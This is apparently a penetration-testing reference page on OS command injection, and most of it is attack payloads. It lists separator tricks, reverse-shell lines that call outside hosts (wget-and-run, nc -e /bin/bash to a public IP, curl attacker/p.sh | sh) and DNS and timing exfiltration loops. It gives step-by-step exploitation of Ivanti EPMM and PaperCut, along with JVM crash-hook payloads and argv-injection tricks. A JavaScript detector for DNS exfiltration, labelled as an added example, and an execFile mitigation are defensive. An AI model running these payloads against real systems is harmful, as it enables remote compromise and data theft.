Command Injection


What is command injection?

A command injection permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. As a result, the application and all of its data can be fully compromised. Executing these commands typically allows the attacker to gain unauthorized access to, or control over, the application's environment and the underlying system.

Context

Depending on where your input is being injected, you may need to terminate the quoted context (using " or ') before the commands.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limitation Bypasses

If you are trying to execute arbitrary commands inside a Linux machine, you will be interested in reading about these bypasses:

Bypass Linux Restrictions

Examples

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Bash arithmetic evaluation in RewriteMap/CGI-style scripts

RewriteMap helpers written in bash sometimes copy query params into globals and later evaluate them in arithmetic contexts ([[ $a -gt $b ]], $((...)), let). Arithmetic expansion re-tokenizes the contents, so attacker-controlled variable names or array references are expanded twice and can be executed.

Example observed in Ivanti EPMM RewriteMap helpers:

  1. Params are stored in globals (st → gStartTime, h → theValue).
  2. They are later evaluated:
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then
...
fi
  3. Send st=theValue so that gStartTime points at the string theValue.
  4. Send h=gPath['sleep 5'] so that theValue carries an array index; during the arithmetic check it runs sleep 5 (replace with a real payload).

Test (~5s delay followed by a 404 if vulnerable):

curl -k "https://TARGET/mifs/c/appstore/fob/ANY?st=theValue&h=gPath['sleep 5']"

Notes:

  • Look for the same helper under other prefixes (e.g., /mifs/c/aftstore/fob/).
  • The arithmetic context treats unknown tokens as variable/array identifiers, so this bypasses simple metacharacter filters.

Parameters

Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Extracting data: char by char

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Based on the tool from https://github.com/HoLyVieR/dnsbin, also hosted at dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Online tools to check for DNS based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in
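On the defensive side, the lookups generated by the `host` loop above leave a recognisable trail in resolver query logs. The following is an added example (not part of the original page) of detection logic run over constructed query-log lines; the log format, source addresses and thresholds are assumptions for the demo:

```javascript
// Added example (not from the original page): flag DNS-based exfiltration like
// the `host "$i.<id>.d.zhack.ca"` loop above in resolver query logs.
// Log lines, source IPs and thresholds below are constructed for this example.
const QUERY_LOG = [
  'ts=1 src=10.0.0.5 q=www.example.com type=A',
  'ts=2 src=10.0.0.5 q=bin.3a43c7e4e57a8d0e2057.d.zhack.ca type=A',
  'ts=2 src=10.0.0.5 q=etc.3a43c7e4e57a8d0e2057.d.zhack.ca type=A',
  'ts=3 src=10.0.0.5 q=home.3a43c7e4e57a8d0e2057.d.zhack.ca type=A',
  'ts=4 src=10.0.0.9 q=GNU-Wget-1214-built-on-linux-gnu.sudo.co.il type=A',
  'ts=5 src=10.0.0.7 q=mail.example.com type=A',
];

const LONG_LABEL = 30;                 // labels this long are rare in real hostnames
const HEX_LABEL = /^[0-9a-f]{16,}$/i;  // hex/hash-like labels usually carry encoded data
const BURST = 3;                       // distinct names under one suffix from one source

// Parse one constructed log line into { src, qname } or null.
function parseLine(line) {
  const m = /src=(\S+) q=(\S+)/.exec(line);
  return m ? { src: m[1], qname: m[2].toLowerCase() } : null;
}

// Assumption: the registrable zone is the last two labels (good enough for a demo).
function suffixOf(qname) {
  return qname.split('.').slice(-2).join('.');
}

// Group queries by (source, suffix) and return one finding per suspicious pair.
function detectDnsExfil(lines) {
  const groups = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const key = `${rec.src} ${suffixOf(rec.qname)}`;
    const g = groups.get(key) || { names: new Set(), reasons: new Set() };
    g.names.add(rec.qname);
    for (const label of rec.qname.split('.').slice(0, -2)) {
      if (label.length >= LONG_LABEL) g.reasons.add('long-label');
      if (HEX_LABEL.test(label)) g.reasons.add('hex-label');
    }
    if (g.names.size >= BURST) g.reasons.add('subdomain-burst');
    groups.set(key, g);
  }
  const findings = [];
  for (const [key, g] of groups) {
    if (g.reasons.size) findings.push({ key, reasons: [...g.reasons].sort() });
  }
  return findings;
}

console.log(JSON.stringify(detectDnsExfil(QUERY_LOG), null, 1));
```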

Filter bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

When auditing JavaScript/TypeScript back-ends you will very often come across the Node.js child_process API.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
  /* … */
});

exec() spawns a shell (/bin/sh -c), so any character that has a special meaning to the shell (back-ticks, ;, &&, |, $(), …) results in command injection when user input is concatenated into the string.

Mitigation: use execFile() (or spawn() without the shell option) and pass each argument as a separate array element so that no shell is involved:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
  '--id_user', id_user,
  '--payload', JSON.stringify(payload)
]);

Real-world case: Synology Photos ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker-controlled data into id_user, which was later concatenated into an exec() call, achieving RCE (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Not every injection needs shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even via execve/execFile with no shell), many programs will still interpret any argument that starts with - or -- as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviour without ever breaking into a shell.

Typical places where this shows up:

  • Embedded web UIs/CGI handlers that build commands such as ping <user>, tcpdump -i <iface> -w <file>, curl <url>, etc.
  • Centralized CGI routers (e.g., /cgi-bin/<something>.cgi with a selector parameter like topicurl=<handler>) where many handlers reuse the same weak validator.

What to try:

  • Supply values that start with -/-- so the downstream tool consumes them as flags.
  • Abuse flags that change behaviour or write files, for example:
    • ping: -f/-c 100000 to stress the device (DoS)
    • curl: -o /tmp/x to write to arbitrary paths, -K <url> to load attacker-controlled config
    • tcpdump: -G 1 -W 1 -z /path/script.sh to get post-rotate execution in insecure wrappers
  • If the program supports -- end-of-options, try to bypass naive mitigations that place -- in the wrong position.

Generic PoC examples against centralized CGI dispatchers:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

JVM diagnostic callbacks for guaranteed execution

Any primitive that lets you inject JVM command-line arguments (_JAVA_OPTIONS, launcher config files, AdditionalJavaArguments fields in desktop agents, etc.) can be turned into reliable RCE without touching application bytecode:

  1. Force a predictable crash by shrinking metaspace or heap: -XX:MaxMetaspaceSize=16m (or a tiny -Xmx). This guarantees an OutOfMemoryError even during early bootstrap.
  2. Attach an error hook: -XX:OnOutOfMemoryError="<cmd>" or -XX:OnError="<cmd>" makes an arbitrary OS command run every time the JVM dies.
  3. Optionally add -XX:+CrashOnOutOfMemoryError to skip recovery attempts and make the payload one-shot.

Example payloads:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Because these diagnostics are parsed by the JVM itself, no shell metacharacters are required and the command runs at the same integrity level as the launcher. Desktop IPC bugs that forward user-supplied JVM flags (see Localhost WebSocket abuse) translate directly into OS command execution.

PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE

  • Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) expose /app?service=page/SetupCompleted; browsing there and clicking Login returns a valid JSESSIONID without any credentials (authentication bypass in the setup flow).
  • In Options → Config Editor, set print-and-device.script.enabled=Y and print.script.sandboxed=N to enable printer scripting and disable the sandbox.
  • On a printer's Scripting tab, enable the script and leave printJobHook defined to avoid validation errors, but place the payload outside the function so it executes as soon as you click Apply (no print job required):
function printJobHook(inputs, actions) {}
cmd = ["bash","-c","curl http://attacker/hit"];
java.lang.Runtime.getRuntime().exec(cmd);
  • Swap the callback for a reverse shell; if the UI/PoC cannot handle pipes/redirects, stage a single-command payload and then exec it with a second request.
  • Horizon3's CVE-2023-27350.py automates the auth bypass, config flips, command execution and rollback; run it through an upstream proxy (e.g., proxychains → Squid) when the service is only reachable internally.

Brute-Force Detection List

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt
